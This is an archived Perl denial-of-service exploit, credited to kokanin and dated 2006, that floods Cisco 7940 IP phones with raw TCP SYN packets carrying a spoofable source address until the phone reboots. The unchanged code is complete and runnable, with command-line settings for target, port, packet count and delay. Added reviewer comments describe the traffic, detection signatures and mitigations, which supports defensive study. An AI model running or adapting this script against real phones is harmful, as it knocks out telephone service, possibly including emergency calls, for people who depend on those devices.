1 #!/usr/bin/perl
2 # This is made for trashing Cisco 7940 IP phones. kokanin made/discovered this.
3 # A packet count of 1000 and a packet delay of 0.002 sent to port 80 makes my
4 # phone reboot - play with the settings and stuff. PRIVATE PRIVATE PRIVATE!!!
5 # Not private anymore. Vulnerable phones are running ver. 7.0(2.0) using the skinny
6 # protocol - this is not for the SIP firmware.
7
8 use Net::RawIP;
9 use Time::HiRes;
# Reviewer annotations (defender's reading of the listing; the code lines are unchanged).
#
# Purpose: emits a run of bare TCP SYN segments at a single port on one host.
# Per the header comment, about 1000 segments spaced 0.002 s apart at port 80
# caused a 7940 on skinny firmware 7.0(2.0) to reboot.
#
# Traffic as it would appear on the wire, from the fields set below:
#   - IP source and destination come straight from the command line, so the
#     source address is whatever the sender typed, not necessarily its own.
#   - TCP SYN set, sequence number 0, acknowledgement number 0.
#   - A new source port is drawn with int(rand(65535)) before every send.
#   - No later handshake segment is sent by this script; every segment is a
#     fresh SYN.
#
# Detection ideas: a burst of SYNs to one phone address and port, from one
# source address with changing source ports, none followed by a completed
# handshake. The constant sequence number 0 looks like a useful signature
# (normal stacks pick varying initial sequence numbers) - confirm against
# baseline traffic before alerting on it. Unexpected phone reboots or
# re-registrations that line up with such a burst are the host-side symptom.
#
# Mitigation ideas: limit which hosts can reach the phones' TCP services
# (ACLs at the voice VLAN boundary), apply source-address validation /
# anti-spoofing filtering because the source field is attacker-chosen, and
# move off the firmware version named in the header - check the vendor's
# advisory for the fixed release.
#
# The object below is the single packet template reused for every send.
10 $pkt = new Net::RawIP;
# Only the truthiness of the fifth argument is tested; none of the five
# arguments is validated before use.
11 die "Usage $0 <src> <dst> <target port> <number of pkts> <packet delay>" unless ($ARGV[4]);
# Fixed header fields: addresses and destination port from the arguments,
# SYN flag on, sequence and acknowledgement numbers zero.
12 $pkt−>set({
13 ip => {
14 saddr => $ARGV[0],
15 daddr => $ARGV[1]
16 },
17 tcp=> { dest => $ARGV[2],
18 syn => 1,
19 seq => 0,
20 ack => 0}
21 });
# Send loop: one iteration per requested packet. Each pass picks a new source
# port, sleeps for the requested delay (Time::HiRes::sleep takes fractional
# seconds), then sends the template.
22 for(1..$ARGV[3]){ $pkt−>set({tcp=>{source=>int(rand(65535))}});Time::HiRes::sleep($ARGV[4]); $pkt−>send; };
23
24 # milw0rm.com [2006-01-10]
Cisco IP Phone 7940 Reboot Denial of Service Exploit
kokanin
01/10/2006